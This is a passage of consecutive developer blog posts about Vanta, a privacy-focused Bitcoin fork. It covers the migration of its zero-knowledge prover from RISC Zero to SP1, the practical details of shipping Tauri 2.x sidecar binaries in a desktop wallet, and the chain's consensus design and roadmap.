The guest program in [`vanta-circuits/methods/guest/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-circuits/methods/guest) is a thin shim. Its only zkVM-specific code is `sp1_zkvm::io::read()` to pull private inputs and `sp1_zkvm::io::commit()` to commit public outputs to the proof journal. Swapping to a different zkVM is a few lines of code in a file that is a few dozen lines long. It is not an architectural change.

That split is why I'm comfortable saying we could swap zkVMs *again* without an architectural rewrite. The chain doesn't know what proof system it's running; it knows how to verify a journal.

## What the host prover looks like

Here's the actual prover from [`vanta-circuits/src/prover.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-circuits/src/prover.rs):

```rust
pub fn prove_transfer(
    private_inputs: &TransferPrivateInputs,
    smt_root: &Hash,
) -> Result<(SP1ProofWithPublicValues, TransferPublicInputs)> {
    let pi = private_inputs.clone();
    let root = *smt_root;

    let result = std::thread::spawn(move || -> Result<...> {
        let mut stdin = SP1Stdin::new();
        stdin.write(&pi);
        stdin.write(&root);

        let client = ProverClient::from_env();
        let pk = client.setup(GUEST_ELF.clone())?;

        // Use compressed proofs (no Docker dependency).
        // Groth16 wrapping requires Docker + Gnark — enable later for production.
        let proof = client.prove(&pk, stdin).compressed().run()?;

        let mut proof_clone = proof.clone();
        let public_inputs: TransferPublicInputs = proof_clone.public_values.read();

        Ok((proof, public_inputs))
    })
    .join()
    .map_err(|e| anyhow::anyhow!("proof thread panicked: {:?}", e))??;

    Ok(result)
}
```

A couple of details worth pulling out.

**Compressed proofs, not Groth16-wrapped.** SP1 supports a Groth16 wrapping step that shrinks the receipt from ~1.27 MB to ~260 bytes. v2.0 ships compressed Plonky3 instead because Groth16 wrapping requires a Docker + Gnark toolchain that I did not want in the consensus-critical path at launch. Smaller proofs are a future release.

**Spawn-on-thread because of tokio.** SP1's blocking ProverClient creates its own tokio runtime. If you call it from inside another tokio runtime — which is what happens when the Axum wallet or the Tauri app invokes the prover — you get a "runtime in runtime" panic. Spawning the prove call on a dedicated `std::thread` and joining it cleanly side-steps that.

This is the kind of footgun that's invisible at unit-test time and very visible at integration-test time. It cost me an afternoon. Documented now.

**`include_elf!` macro.** The guest binary is embedded into the host binary at compile time:

```rust
pub static GUEST_ELF: Elf = include_elf!("vanta-guest");
```

That means the wallet binary (or the Tauri host) carries the guest ELF along with the proving stack. No separate file to ship, no path resolution. This was one of the SP1 ergonomic wins over RISC Zero — the include macro removes a class of "where's the guest" bugs.

## What stayed identical

The cryptographic protocol *did not change* between RISC Zero and SP1. From the engineering paper:

> ### 4.1 The Privacy Model Is Application-Layer, Not Prover-Layer
>
> Vanta's privacy guarantees come from four cryptographic constructions, all of which are implemented in `vanta-core` and are independent of the proof system:
>
> **Commitment hiding.** A note commitment is computed as:
> $$\text{cm} = H(\text{"Vanta/NoteCommitment/v1"}, \text{value} \| \text{owner\_pk} \| \text{asset\_type} \| r)$$
>
> The hiding property — the fact that an observer cannot determine the committed values from the commitment — comes from the randomness $r$ and the preimage resistance of the hash function. This has nothing to do with the proof system. Whether the commitment is computed inside SP1, inside another zkVM, or on a napkin, the hiding property is identical.

This is the load-bearing insight. The proof system is an *attestation layer*. It says "I correctly executed this Rust program against these private inputs and the public outputs are these." It does not contribute to the soundness of the commitment scheme, the unlinkability of the nullifier, or the integrity of the SMT membership proof. Those properties live in the application code that runs *inside* the proof.

## Why SP1 won

The full case is in the engineering paper. The short version:

**Speed.** SP1 generates compressed Plonky3 receipts for Vanta's transfer workload in 30–60 seconds on a modern multi-core CPU. RISC Zero in our early benchmarks was slower — comparable on simple programs, materially slower once domain-separated SHA-256 was the dominant operation. SP1's SHA-256 precompile is the difference; it substitutes a hand-optimized circuit for the operation rather than proving SHA-256 instruction-by-instruction through the RISC-V execution trace.

**Trusted-setup posture.** Plonky3 is a hash-based STARK. It is post-quantum-resilient (under Grover's algorithm, 256-bit hash → 128-bit effective security is still strong) and it has *no trusted setup, no SRS, no powers-of-tau ceremony*. Anyone can compile the prover and verifier from source and run them without trusting a third party to have generated setup parameters correctly.

This was a hard requirement for Vanta. The engineering paper is opinionated about it:

> a permanent contingent backdoor against a single participant's operational discipline is not a substitute for transparent cryptography.

That sentence is the reason we don't ship Groth16, despite Groth16's ~260-byte proofs. Groth16's per-circuit trusted setup requires a multi-party-computation ceremony where the security assumption is "at least one participant was honest and destroyed their share." We didn't want to carry that assumption.

**SDK ergonomics.** SP1's `include_elf!`, `SP1Stdin`, `ProverClient` API, and the cargo-prove tool are well-typed and well-documented. The development cycle is fast and doesn't require specialized tooling beyond the Rust toolchain plus the SP1 target.

**Active development + funding.** Succinct (the company) has raised over $55M and ships monthly releases with measurable performance improvements. SP1 is MIT/Apache-2.0, used in production by multiple chains. Lower abandonment risk than smaller projects.

**GPU acceleration available.** SP1 has CUDA-based GPU proving. Doesn't matter for the wallet path (we're not putting GPUs in user laptops) but matters for the proving-network and miner-prover roles.

## What the FFI verifier looks like

The FFI lives in [`vanta/vanta-verifier-ffi/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) and compiles to `libvanta_verifier.a`. It exposes two functions to C++:

```
bool vanta_verify_and_decode(const uint8_t *proof_bytes, size_t proof_len, VantaJournal *out);
bool vanta_decode_journal(const uint8_t *bytes, size_t len, VantaJournal *out);
```

The C++ consensus engine in `src/script/interpreter.cpp` calls `vanta_verify_and_decode` from the witness-v2 branch. It hands over a byte slice (the SP1 receipt embedded in `witness.stack[0]`) and receives back a boolean and a populated `VantaJournal`. The `VantaJournal` is the 440-byte struct from the engineering paper:

```c
typedef struct {
    uint8_t  smt_root[32];
    uint32_t input_commitment_count;
    uint8_t  input_commitments[VANTA_MAX_SLOTS][32];
    uint32_t nullifier_count;
    uint8_t  nullifiers[VANTA_MAX_SLOTS][32];
    uint32_t commitment_count;
    uint8_t  commitments[VANTA_MAX_SLOTS][32];
    int64_t  value_balance;
} VantaJournal;
```

The C++ doesn't deserialize the proof. It doesn't know the proof system. It looks at 32-byte hashes and a signed `int64_t`, and:

- checks the `input_commitments` against the spent UTXO's `OP_2 PUSH32 <commitment>` script
- checks the `nullifiers` against the chainstate nullifier set ([the post on this](/blog/vanta_l1_nullifier_set/))
- checks the `smt_root` against the chain's currently committed state root
- checks `value_balance` for sign + balance against any transparent outputs in the transaction

That's the whole consensus contract. The proof verified bit either is or isn't set. Everything else is byte arithmetic.

The minimal-FFI design is what makes the audit story tractable. A fuzzer can hammer the boundary and you'll know if `vanta_verify_and_decode` ever populates a journal that the proof didn't actually attest to. The Rust side is the thing that needs the careful audit; the C++ side is reading bytes.

## What I learned about zkVMs by switching

A few things I'd tell my past self.

**Decouple the cryptographic protocol from the proof system. Hard.** It is enormously tempting to put commitment construction in the guest program. Don't. Put it in `vanta-core`, call it from the guest, *and call it from native unit tests*. The native unit tests are how you find off-by-one byte ordering bugs without paying 30s/proof to find them.

**The journal is the public contract.** Whatever public outputs you commit to the proof journal *are* your interface. Adding a field is a forking change for the verifier. Removing one is too. Plan the journal layout the way you'd plan a serialised network message: explicit, versioned, ABI-stable.

**Compressed proofs are large.** ~1.27 MB on Vanta. That meant raising `MAX_STANDARD_TX_WEIGHT` to `MAX_BLOCK_WEIGHT` so a single witness-v2 spend fits in one transaction. Plan the chain parameters around the proof size you ship with, and budget for the eventual Groth16-wrapping shrink.

**zkVM benchmarks lie about your workload.** Generic prover benchmarks measure simple programs. Yours is not simple. Measure your *actual circuit* against the candidates before deciding. SP1's SHA-256 precompile dominated our workload; if your hashing is Poseidon over a different field, your numbers will look different.

## What's next

The roadmap from the papers calls out a few things that have *not* shipped yet:

- **Groth16 wrapping** to bring receipt size from 1.27 MB to ~260 bytes. Deferred for the Docker dependency reason above.
- **Poseidon migration** to replace SHA-256 in the commitment scheme with a ZK-friendlier hash. Performance win, no security change.
- **GPU proving distribution.** SP1 supports CUDA but we haven't shipped a wallet path that uses it; the lift is mostly UX (how does the user point at a GPU?) and packaging.

The architectural property I want to keep regardless of which of these lands: *the chain doesn't know what proof system it's running, it knows how to verify a journal*. That's the property that lets us swap zkVMs again. It's the property that lets the eventual full-Rust node rewrite ship without a forking change. It's the property that, six years from now, lets us swap the proof backend for whatever has won the 2032 cryptography landscape.

## Further reading

- [`vanta/vanta-circuits`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-circuits) — host prover + guest program
- [`vanta/vanta-verifier-ffi`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) — the static library linked into vantad
- [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — full design rationale
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain the verifier protects
- [L1 nullifier sets: enforcing no-double-spend at consensus](/blog/vanta_l1_nullifier_set/) — what the verifier's nullifiers feed into
- [SP1 docs](https://docs.succinct.xyz/docs/sp1/introduction) — the prover we ship
- [Plonky3 repo](https://github.com/Plonky3/Plonky3) — the proof backend


---

# Tauri 2.x sidecars in anger: the ergonomics paper-cuts I had to fix

Canonical: https://blog.skill-issue.dev/blog/vanta_tauri_ergonomics/
Description: externalBin wants a target-triple suffix nobody documents loudly enough. The dev resolver walks up parents. Startup must be sequenced. The setup-sidecars.sh + resolve_binary() story for shipping a wallet that runs its own node.
Published: 2026-04-13T21:45:02.000Z
Tags: vanta, tauri, rust, desktop, sidecar, devenv


The [Vanta Desktop walkthrough](/blog/vanta_desktop_tauri_wallet/) is the architectural story: a Tauri 2.x wallet that ships its own full node, supervises three sidecar binaries, and exposes everything through `#[tauri::command]` IPC. That post is the *what.* This post is the *how* — the small, awkward, under-documented ergonomics details that took me a working week to figure out.

If you're shipping a Tauri app with sidecar binaries in 2026 and you're hitting walls, this post is the field notes I wish someone had written for me. If you're not, skip it.

## The target-triple suffix

The first wall is the one that's most easily missed because it works fine in production and breaks subtly in dev. Tauri's `externalBin` config in [`tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) declares the sidecar binaries:

```json
"externalBin": [
  "binaries/vantad",
  "binaries/vanta-node",
  "binaries/vanta-cli"
]
```

The bundler does *not* look for `binaries/vantad` literally. It looks for `binaries/vantad-<rustc-host-target-triple>` — that is, the file with the target-triple appended.

On Apple Silicon that's `binaries/vantad-aarch64-apple-darwin`. On Intel macOS it's `binaries/vantad-x86_64-apple-darwin`. On Linux it's `binaries/vantad-x86_64-unknown-linux-gnu`. Windows is `binaries/vantad-x86_64-pc-windows-msvc`.

If the file is named just `binaries/vantad`, Tauri's bundler emits a moderately cryptic error during `tauri build`. The fix is renaming the file. The discovery process for figuring this out is `tauri build` → fail → google → find a [years-old GitHub issue](https://github.com/tauri-apps/tauri/issues) → realise.

The setup script that handles this lives in [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) and the load-bearing line is the very first one:

```bash
TRIPLE=$(rustc -vV | grep host | awk '{print $2}')
```

`rustc -vV` outputs Rust's verbose version info, which includes a `host: <triple>` line. Awk picks the second field. The variable then suffixes every file copied into `src-tauri/binaries/`:

```bash
cp "$VANTAD" "$BINDIR/vantad-$TRIPLE"
cp "$ZERANODE" "$BINDIR/vanta-node-$TRIPLE"
```

That's the canonical way to discover the host triple, and it's what every Tauri tutorial buries five paragraphs in. **Do not hardcode the triple.** A Mac developer who switches between aarch64 and x86_64 (e.g., a Rosetta context for testing) will produce one set of binaries from one shell and another from another, and the bundler will pick whichever is on disk *and* matches the active build target — only one of which is correct on any given build.

The full search for `vantad` in `setup-sidecars.sh` walks well-known locations:

```bash
VANTAD="${ZERA_L1_BIN:-}"
if [ -z "$VANTAD" ]; then
  for candidate in \
    "../src/vantad" \
    "../../src/vantad" \
    "/usr/local/bin/vantad" \
    ; do
    if [ -x "$candidate" ]; then
      VANTAD="$candidate"
      break
    fi
  done
fi
```

The `../src/vantad` and `../../src/vantad` are relative paths from `vanta-desktop/` and `vanta-desktop/src-tauri/` respectively. The `/usr/local/bin/vantad` is the canonical install path on macOS. The `ZERA_L1_BIN` env var is the escape hatch for non-default layouts. (The variable name still reads `ZERA_L1_BIN` because of the [zeracoin → vanta rebrand](/blog/vanta_darwin_apple_silicon_build/) — pre-rebrand artefact, on the cleanup list.)

## The dev-mode resolver

The bundler problem is solved at *build* time. There's a different problem at *dev* time: when you `cargo run` the Tauri host directly (or `pnpm tauri dev`), the executable lives at `src-tauri/target/debug/vanta-desktop`, not in a `.app` bundle. The sidecars aren't sitting next to the host executable; they're at `src-tauri/binaries/vanta*-<triple>`.

The host has to discover them at runtime, in both production and dev. The function that does this is `resolve_binary` in [`src-tauri/src/node.rs:225`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs):

```rust
pub fn resolve_binary(name: &str, config_path: &str) -> PathBuf {
    let triple = target_triple();
    let suffixed = format!("{name}-{triple}");

    if let Ok(exe) = std::env::current_exe() {
        if let Some(dir) = exe.parent() {
            // Production: sidecars are next to the exe with triple suffix
            for candidate in [
                dir.join(&suffixed),
                dir.join(name),
            ] {
                if candidate.exists() && candidate.metadata().map(|m| m.len() > 0).unwrap_or(false) {
                    tracing::info!("Found sidecar: {}", candidate.display());
                    return candidate;
                }
            }

            // Dev mode: the exe is at src-tauri/target/debug/vanta-desktop.
            // Walk up ancestors looking for a `binaries/` dir containing our binary.
            for ancestor in dir.ancestors().skip(1) {
                let candidate = ancestor.join("binaries").join(&suffixed);
                if candidate.exists() && candidate.metadata().map(|m| m.len() > 0).unwrap_or(false) {
                    tracing::info!("Found dev sidecar: {}", candidate.display());
                    return candidate;
                }
            }
        }
    }

    // Check explicit config path
    let config = PathBuf::from(config_path);
    if config.exists() && config.metadata().map(|m| m.len() > 0).unwrap_or(false) {
        return config;
    }

    // Fall back to PATH lookup
    PathBuf::from(name)
}
```

The five-tier resolution order is:

1. Same directory as the host exe, with the triple suffix → production bundle.
2. Same directory as the host exe, without suffix → also production, fallback for some bundlers.
3. Walk up the parent chain looking for a `binaries/` directory → dev mode.
4. Explicit path from `WalletConfig` → user override.
5. Bare `name` → `PATH` lookup.

The fallback to PATH is what lets a developer with `vantad` already installed at `/usr/local/bin/vantad` skip the `setup-sidecars.sh` step entirely if they want to. The metadata check for `len() > 0` is paranoia — empty files passing existence checks have caused at least one wasted afternoon.

The `target_triple()` helper picks the right suffix based on `cfg!`:

```rust
pub fn target_triple() -> &'static str {
    if cfg!(target_os = "macos") {
        if cfg!(target_arch = "aarch64") {
            "aarch64-apple-darwin"
        } else {
            "x86_64-apple-darwin"
        }
    } else if cfg!(target_os = "linux") {
        "x86_64-unknown-linux-gnu"
    } else {
        "x86_64-pc-windows-msvc"
    }
}
```

This is intentionally a hardcoded match. We don't support other target triples (yet — Linux ARM is an "if a user complains" item). Hardcoding means the build fails loudly if someone tries to compile for an unsupported target, instead of silently producing a binary that can't find its sidecars.

## The signing identity

Tauri 2.x's macOS bundler signs every binary in the `.app` with the identity declared in `tauri.conf.json`:

```json
"macOS": {
    "signingIdentity": "474F624D8F3783B4D607CFF2331AD4C6CC26A1B5",
    "providerShortName": "9HD4Q82U58",
    "entitlements": "entitlements.plist",
    "minimumSystemVersion": "10.15"
}
```

`signingIdentity` is the SHA1 fingerprint of an Apple Developer ID Application certificate. You can list yours with `security find-identity -v -p codesigning`. The format `474F62...` is a hex fingerprint, not a CN string — Tauri specifically looks up by fingerprint to disambiguate when you have multiple Developer ID certs in keychain. This took me a few false starts to land on; the first version of this config used the human-readable CN ("Developer ID Application: Hayden Porter-Aylor (9HD4Q82U58)") and broke when I had two certs from different teams.

`providerShortName` is the Apple Team ID, the same string that goes in the cert's CN. It's needed for notarisation — `xcrun notarytool submit` requires `--team-id` to match this value.

`entitlements` points at a separate plist file. Tauri's default entitlements are too permissive for a wallet; ours pins network access (we need it for the L2 P2P), allows JIT (because the WebView needs it), and otherwise denies everything — including microphone, camera, location, and the raft of other Apple-managed entitlements that a finance app should not be requesting.

## Sequenced startup, not parallel

The first version of the wallet started both nodes in parallel, hoping the L2 watcher would survive its first few RPC failures while the L1 came up. It didn't. The L2 would crash on its first poll, the supervisor would log "L2 stopped," the user would see "L2 disconnected," and the eventual successful start (after `vantad`'s 30-second startup) would race the user's first attempt to send a transaction.

The fix is in [`src-tauri/src/lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) and the structure is five sequenced stages:

```
Stage 1: Start L1 (may adopt)
Stage 2: Wait for L1 RPC up to 60s, exponential backoff
Stage 3: Create / load default wallet via RPC
Stage 4: Start L2 (now that L1 is confirmed reachable)
Stage 5: emit "ready" event to frontend
```

Each stage emits a Tauri event (`startup-stage`) the frontend subscribes to. The user-facing UX is a five-step progress meter that goes "spawning vantad… RPC ready… wallet loaded… spawning vanta-node… ready." On a warm cache the whole flow takes about 4 seconds. On a cold first launch with chainstate to load, it's closer to 12.

The stage-by-stage approach makes failures actionable. If stage 2 times out (L1 RPC didn't come up), the error message points at L1; if stage 4 fails, it points at L2. The pre-stage version of this had a single `start_nodes()` command whose only failure mode was a generic "couldn't start nodes," which was useless for support.

## The NodeManager struct

The supervisor is a single struct in [`src-tauri/src/node.rs:178`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs):

```rust
pub struct NodeManager {
    l1_process: Option<Child>,
    l2_process: Option<Child>,
    /// When true, we detected a pre-existing L1 that we're reusing.
    l1_adopted: bool,
    /// When true, we detected a pre-existing L2 that we're reusing.
    l2_adopted: bool,
    /// Resolved path to vantad binary.
    l1_bin: Option<PathBuf>,
    /// Resolved path to vanta-node binary.
    l2_bin: Option<PathBuf>,
    /// Recent output from L1 process.
    pub l1_logs: LogBuffer,
    /// Recent output from L2 process.
    pub l2_logs: LogBuffer,
    /// Tauri app handle for emitting events.
    app_handle: Option<tauri::AppHandle>,
}
```

The fields tell the whole story:

- Two `Option<Child>` — the live process handles, when we own them.
- Two `bool`s — adopted flags. When the desktop starts and finds an existing `vantad` already listening on `19332`, it doesn't kill it; it adopts it (PID 0 sentinel) and proceeds. The adoption logic exists because every quit-and-relaunch from a previous version of the app would otherwise produce a "port in use" error.
- Two `PathBuf`s — the resolved binary paths, useful for the diagnostic UI ("the wallet is using `vantad` at /Applications/Vanta Wallet.app/Contents/MacOS/vantad-aarch64-apple-darwin").
- Two `LogBuffer`s — 200-line ring buffers per process, served to the frontend on demand for the live console view.
- The `AppHandle` — used to emit Tauri events for log lines (so the frontend can render a rolling log view without polling).

## Pipe draining as a load-bearing detail

A Bitcoin-Core C++ process logging to stdout will eventually fill the OS's 64 KB pipe buffer if nobody reads it, and then *block on its next `write()`*. `vantad` with `-printtoconsole` is a heavy logger; without an active reader, it deadlocks within minutes.

The `drain_pipe` function in [`node.rs:64`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) is the safety net. Every line goes three places:

1. `tracing::debug!` — the structured log file.
2. `LogBuffer::push` — the in-memory ring buffer for the frontend.
3. `app.emit("node-log", …)` — a Tauri event the frontend subscribes to for live rendering.

That last one is the path I want to underline. The first version of the wallet had no live log surface; debugging a "node won't start" required `tail -f` on the log file. The Tauri event channel turned that into a frontend log component that streams stdout in real time, which by itself paid for the IPC complexity ten times over.

## Auto-config for the L1

Before `vantad` starts, the host writes a `vanta.conf` into `{home}/.vanta-desktop/l1/`. The config is hardcoded for the desktop's port plan, points at the seed nodes, and disables Bitcoin-style DNS seeding. Excerpt:

```rust
let conf = format!(
    "# Vanta Desktop Wallet — auto-generated config\n\
     server=1\n\
     daemon=0\n\
     txindex=1\n\
     listen=1\n\
     rpcport={DESKTOP_L1_RPC_PORT}\n\
     port={DESKTOP_L1_P2P_PORT}\n\
     rpcuser={}\n\
     rpcpassword={}\n\
     rpcallowip=127.0.0.1\n\
     rpcbind=127.0.0.1\n\
     dnsseed=0\n\
     addnode=64.34.82.145:9333\n\
     addnode=66.241.124.138:9333\n\
     wallet=default\n\
     fallbackfee=0.0001\n",
    config.rpc_user, config.rpc_pass,
);
std::fs::write(&conf_path, &conf)?;
```

Three things in here that are non-obvious:

**`txindex=1`.** The L2 watcher needs to look up arbitrary historic transactions to scan for OP_RETURN anchors. Without `txindex`, `getrawtransaction` only works for unspent outputs. With it, every transaction is indexed by txid forever. This costs ~10% extra disk vs a stock node; the L2 work flat-out doesn't function without it.

**`dnsseed=0`.** Bitcoin Core auto-discovers peers from a hardcoded list of DNS seeds. Vanta's a separate network with separate seeds; if `dnsseed=1`, vantad will spam `seed.bitcoin.sipa.be` looking for peers it'll never find. Disabling it cuts the startup chatter and the wasted DNS queries.

**`addnode=64.34.82.145:9333`.** The Latitude bare-metal seed node, hardcoded into the desktop config. Until the chain has organic peer discovery, this is the bootstrap. (More on this in [the fly+bare-metal post](/blog/vanta_flytoml_latitude_baremetal/).)

The user never sees this file unless they go looking. Pinning the config to the desktop's port plan also means the wallet never collides with a standalone `vantad` running on default ports — which matters because some users run both.

## The Linux/NVIDIA cursed stanza

Two lines in [`lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) earned a comment longer than they are:

```rust
#[cfg(target_os = "linux")]
{
    if std::env::var("WEBKIT_DISABLE_DMABUF_RENDERER").is_err() {
        std::env::set_var("WEBKIT_DISABLE_DMABUF_RENDERER", "1");
    }
}
```

webkit2gtk on NVIDIA's proprietary driver under Wayland tries to use a DMA-BUF renderer path that crashes with `Error 71 (Protocol error) dispatching to Wayland display`. Disabling it forces software compositing, which is fine.

This is the canonical example of "Tauri 2.x ergonomics" actually meaning "the OS will surprise you in ways the web never has." Budget for it. Apps that ship to general users discover bugs that only happen on specific GPU + display server + driver combinations. The fix is usually environmental; the discovery is a weekend.

## What I changed my mind about

The big one: **Tauri's sidecar story is the right way to ship a wallet that runs a node.** The alternative — telling users to run `vantad` themselves and pointing the wallet at it — is a non-starter for everybody but engineers like me. The friction of the embedded full-node story turns out to be entirely inside the *developer* (the build process, the signing pipeline, the auto-update story). The user friction is zero. They double-click a DMG and they're a node operator.

The smaller one: **the build is more code than the app.** [`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) is 200 lines, [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) is 60. Combined that's about as much shell as the rest of `src-tauri/` is Rust outside `commands.rs`. The shell is *load-bearing infrastructure*, not glue. Treat it that way and the build is reproducible; treat it as glue and the build will surprise you on every fresh checkout.

## Further reading

- [`vanta/vanta-desktop/src-tauri/src/node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) — the supervisor and `resolve_binary`
- [`vanta/vanta-desktop/setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) — the binary-rename script
- [`vanta/vanta-desktop/src-tauri/tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) — the bundle config
- [Tauri 2.x sidecar docs](https://tauri.app/v2/develop/sidecar/) — the framework feature this all rides on
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the architecture-level companion
- [Cross-compiling vantad for darwin](/blog/vanta_darwin_apple_silicon_build/) — the macOS half of the build pipeline


---

# Vanta: a Bitcoin fork with ZK at consensus

Canonical: https://blog.skill-issue.dev/blog/vanta_zk_privacy_l1/
Description: 42 billion supply. 1-minute blocks. RISC Zero proofs verified at consensus. The opinionated answer to 'why fork Bitcoin in 2026?' is that you're not really forking Bitcoin — you're shipping a different L1 that has Bitcoin's surface area.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, bitcoin, zk, risc-zero, consensus, l1


You can read this post as the technical version of [Why I started Zera Labs](/blog/why_i_started_zera_labs/). The strategy lived there. The code lives in [`Dax911/vanta`](https://github.com/Dax911/vanta), and the [README](https://github.com/Dax911/vanta/blob/main/README.md) opens with a sentence that took me a long time to feel comfortable writing:

> *Vanta L1 — ZK-privacy Layer 1 blockchain — fork of Bitcoin Core v27.0.*

If you spent any time on crypto Twitter in 2024, the words *fork of Bitcoin Core* were code for "vanity chain that nobody serious will run." I want to make the case that this fork is different — not because the C++ source tree is different (most of it isn't) but because the consensus rules are.

## What it is

The headline parameters are deliberate departures from Bitcoin:

| Parameter | Vanta | Bitcoin |
|---|---|---|
| Block reward | 100,000 VANTA | 3.125 BTC (post-2024 halving) |
| Block time | **1 minute** | 10 minutes |
| Total supply | ~42 billion VANTA | ~21 million BTC |
| Halving interval | 210,000 blocks (~146 days) | 210,000 blocks (~4 years) |
| Address prefix | `Z` (legacy), `zer1` (bech32) | `1`, `bc1` |
| Network magic | `0x5a454500` (`"VANTA\0"`) | `0xf9beb4d9` |

A 1-minute block time and a 42-billion supply are not "Bitcoin with a different ticker." They are calibrated to make this chain *feel* like a payments rail rather than a settlement rail. You can confirm a payment in two blocks (2 minutes, ~95% confidence) instead of three blocks (30 minutes). The 100,000-per-block subsidy makes the unit economics of running a node + miner actually work for a small operator.

I have [opinions about small-operator unit economics](/blog/what_running_a_bitcoin_mine_taught_me/) that come from running a [Bitaxe BM1368 against this chain](https://github.com/Dax911/vanta/tree/main/pool) for the past several months.

## The fork strategy: keep what works

The [monorepo structure](https://github.com/Dax911/vanta/blob/main/README.md) is a direct read on the strategy:

```
zl1/
├── src/              # Vanta Core (C++ — Bitcoin Core v27.0 fork)
├── wallet/           # Web wallet (Rust/Axum)
├── txbot/            # Transaction bot (Rust)
├── explorer/         # Block explorer (Node.js — patched btc-rpc-explorer)
├── vanta/            # ZK circuits (Rust/RISC Zero)
├── pool/             # Stratum server (Python)
└── …
```

Bitcoin Core v27.0 is the most-tested codebase on the planet by node-hours. We did not fork it because we thought we could write something better. We forked it because we wanted **a chain that ships day-one with the same tooling humans have spent fifteen years building around Bitcoin** — wallets that can be ported, RPCs that can be wrapped, block explorers that can be patched. The price of admission is that the C++ surface area is huge and you respect it.

We did not fork the *cryptography*. The ZK layer is in the `vanta/` subtree, written in Rust against [RISC Zero's zkVM](https://www.risczero.com), running entirely outside the C++ core. The C++ core verifies one thing: a SHA-256 hash of the proof witness root. That's it. The proof itself is computed and verified in a Rust program that runs as a sidecar. This split means we can change the proof system without forking the chain again, which matters in 2026 because [the proof-system landscape is moving fast](/blog/privacys_broadband_moment/).

## What's at consensus, what's not

Here is the part I want to dwell on, because every privacy-coin design eventually crashes into this question.

**At consensus** (i.e. nodes will reject blocks that don't satisfy these):

1. **ZK proof-to-UTXO binding.** A spending transaction must include a witness v2 input commitment that matches the proof's public input. The C++ validator verifies the binding before the proof is even consulted; the proof confirms it.
2. **SMT root cross-verification.** Every block has a coinbase commitment to the sparse-Merkle-tree root of the post-block nullifier set. The proof root and the coinbase commitment must match. A miner cannot lie about state.
3. **L1 nullifier set tracking.** The nullifier set is part of consensus state, not a wallet-side hint. Two valid blocks attempting to mine a transaction whose nullifier was spent in either block create a hard chain split. Double-spend prevention is **a property of the chain**, not a property of the wallet.

**Not at consensus:**

1. The proof system itself. Today it's Groth16 over the RISC Zero zkVM. We can swap to Halo2 or Nova-style recursion in a soft fork by adding a new opcode and grandfathering the old. The chain doesn't know what proof system it's running; it knows how to verify a witness root.
2. Address format. Z-legacy and zer1-bech32 are wallet-side. The chain treats them all as `OP_PUSHBYTES`-style script commitments.
3. Wallet-level shield/unshield UX. The README lists `shield` and `unshield` as commands for moving between transparent and private. Those are wallet conveniences; the chain itself sees commitments and nullifiers, not "shielded" and "unshielded" as states.

This split is load-bearing. If your fork tries to put the proof system into consensus, you have two terrible choices when the proof system improves: hard-fork the world, or live with worse cryptography forever. Vanta lives somewhere in between: the *binding* is at consensus, the *proof system* is not.

## The roadmap, annotated

The [README's roadmap](https://github.com/Dax911/vanta/blob/main/README.md) is concise; let me unpack the items that are checked.

- **[x] Fork Bitcoin Core v27.0** — the easy part. It's a tree copy and a network-magic change.
- **[x] Custom chain parameters** — most of the work was rewriting `src/chainparams.cpp` and the genesis-block builder. Bitcoin Core makes you re-mine the genesis block locally; the script is in `contrib/`.
- **[x] Solo mining with Bitaxe BM1368** — the [Python Stratum server in `pool/`](https://github.com/Dax911/vanta/tree/main/pool) is a from-scratch Stratum v1 implementation pointed at the local node's RPC. I'll write a separate post on the Bitaxe rig.
- **[x] Web wallet + block explorer** — Rust/Axum wallet, patched btc-rpc-explorer for the explorer. The wallet integrates with the ZK circuits; the explorer renders shielded transactions as opaque commitments.
- **[x] Transaction bot for mempool activity** — synthetic mempool activity is essential during testnet. The Rust txbot generates round-robin spends so you're not staring at empty blocks.
- **[x] RISC Zero ZK circuit integration** — the big one. RISC Zero gives us a zkVM where the circuit is just Rust. We don't write R1CS by hand. The witness for a spend is the same Rust struct the wallet uses; the prover takes that struct and emits a proof.
- **[x] ZK proof-to-UTXO binding** — wired into `src/script/interpreter.cpp` and the witness-v2 stack. A new `OP_VANTA_VERIFY` opcode pulls the proof root from the witness, hashes it with the input commitment, and compares against the script.
- **[x] SMT root cross-verification** — sparse-Merkle-tree state for the nullifier set is materialised in the block header's coinbase. A node that doesn't validate the SMT root rejects the block.
- **[x] L1 nullifier set tracking** — the chainstate db now has a nullifier table. Double-spend at L1, see [my next post](/blog/vanta_l1_nullifier_set/).
- **[x] Shield/unshield wallet commands** — `vanta-cli shield 1.5` moves 1.5 VANTA from a transparent UTXO into a shielded note. `unshield` does the reverse with a destination address. Both produce normal-looking on-chain transactions; the difference is the witness contents.

